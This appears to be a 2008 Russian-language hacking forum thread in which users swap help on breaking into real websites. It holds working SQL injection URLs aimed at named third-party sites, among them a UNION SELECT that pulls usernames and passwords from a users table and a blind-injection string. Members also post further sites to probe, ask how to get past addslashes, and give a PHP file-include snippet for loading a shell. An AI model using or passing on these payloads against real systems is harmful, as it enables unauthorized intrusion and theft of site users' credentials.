Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    Вот проблемка
    Нашел Sql раскрутил и вот
    Code:
    http://www.oke.ru/xo4u.php?id=-42708+UNION+SELECT+1,2,concat_ws(0x3a,nick,passw),4,5,6,7,8,9,10+FROM+chausers/*
    но ниче не выводит
    Таблицы
    Code:
    COLLATIONS.
    COLLATION_CHARACTER_ SET_APPLICABILITY.
    COLUMNS.
    COLUMN_PRIVILEGES.
    ENGINES.
    EVENTS.
    FILES.
    GLOBAL_STATUS.
    GLOBAL_VARIABLES.
    KEY_COLUMN_USAGE.
    PARTITIONS.
    PLUGINS.
    PROCESSLIST.
    REFERENTIAL_CONSTRAI NTS.
    ROUTINES.
    SCHEMATA.
    SCHEMA_PRIVILEGES.
    SESSION_STATUS.
    SESSION_VARIABLES.
    STATISTICS.
    TABLES.
    TABLE_CONSTRAINTS.
    TABLE_PRIVILEGES.
    TRIGGERS.
    USER_PRIVILEGES.
    VIEWS.
    chamess.
    chamess_old1.
    charooms.
    chausers.
    mess.
    wants.
    Колонки в chausers
    Code:
    idate
    nick
    email
    chalogid
    lastdate
    roomid
    passw
     
  2. Naydav

    Naydav Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    439
    Likes Received:
    63
    Reputations:
    4
    Мистерео
    3 и 5 - "Рабочие столбцы", именно их выводит скрипт
    5.1.16-beta-log
    gsokecomru@localhost

    а так все выводит
    Пример
     
    #2482 Naydav, 30 Jun 2008
    Last edited: 30 Jun 2008
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Как понять не выводится? А надпись "фанатик" жирным шрифтом тебя не настораживает? :D
    В этой таблице инфа которую юзеры пишут в комментариях, что ты там хочешь найти?
     
    1 person likes this.
  4. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    ну так в 3 какраз стоит запрос на nick и passw но скрипт не хочет их показывать.
    Все спс
     
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Мистерео
    не знаю как у вас а у меня вообще 7 колонок..))
    нету там вобше ничего в бд.) 4 поломаные таблицы information_schema и oke.chausers.
    достаем колонки данной таблицы.)
    тут мы получаем id и nick тех людей которые пишут коменты...) а где ты там вобше login увидел? тоесть колонка passw - пустая.
    намного интереснее будет почитать желания..))
     
    #2485 sabe, 30 Jun 2008
    Last edited: 30 Jun 2008
    1 person likes this.
  6. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    Есть способ обхода addslashes() ?

    еси там чтото типо

    "select ..bla... id = \"$_GET['bla']\""
     
    #2486 Doom123, 30 Jun 2008
    Last edited: 30 Jun 2008
  7. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    хм.. может попробовать закрыть кавычки с тем же бэкслэшем? если можно линку, то я подумаю.. просто не могу я думать, смотря на голые мускульнуе запросы=)
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999'
     
  9. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    хм.. даже и не понял как там что то можно реализовать... ведь то что выводится ошибка после подстановки кавычки еще не осначает что есть возможность проведения инъекции.. может быть просто в скрипт передано неправильное значение, вот он и ругается, а попытки что то из этого выжать провалились с треском.. по крайней мере у меня..
     
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ну например можно слепую инъекцию использовать:
    Code:
    http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999' WHERE tracking_id=134205 or if ((select 1)=1,1,(select 1 union select 2))=1%23
    
    для закомментирования надо использовать решетку (%23)
    но на самом деле там есть скули с выводом
     
  11. Бармалей

    Бармалей New Member

    Joined:
    30 May 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    есть следующая страничка
    Code:
    <?
    $query="select * from spisok_users where user_name='$login' and password='$password'";
    $result=mysql_query($query, $db);
    $row=mysql_num_rows($result);?>
    так вот можно ли как то изменить ее чтобы сделать из php-инъекцию?
    пробывал
    ?password='%22;echo%22ghbdtn%22;exit;

    или такое вообще не возможно?
     
  12. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Тут есть SQL иньекция, если поля $password и $login выше не фильтруются. Вообще, сначала читай тут, а только потом спрашивай: https://forum.antichat.ru/thread43966.html
     
  13. Бармалей

    Бармалей New Member

    Joined:
    30 May 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    скл инъекции нет так как нету подключения к бд. а поля не фильтруются)
    ссылку прочту) спас)
     
  14. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://funx.md/funx/MAIN.asp?page=1&t=999999999999999&ttype=L
     
  16. fudzimaro

    fudzimaro New Member

    Joined:
    16 Jan 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Ребят ткните носом где то нетак давно я видел сервис, суть его заключалась в том что я ввожу url сайта в ответ мне показывает какие папки есть на сайте
     
  17. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    http://madnet.name/tools/madss/

    работает анализируя выдачу гугла
     
  18. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    кстати.. а где можно почитать на методы проведения sql-inj в MySQL 3.x?
     
  19. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    http://www.securitylab.ru/contest/212101.php
     
  20. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    ыы. Вот, я переделал! :d
    PHP:
    <?php
    if (!empty($_GET['bla'])){include($_GET['bla']);}
    else {echo 
    "не взломал=\";}
    ?>
    script.php?bla=shell.txt
    И станешь ты взломщиком скриптов!
     
    2 people like this.
Thread Status:
Not open for further replies.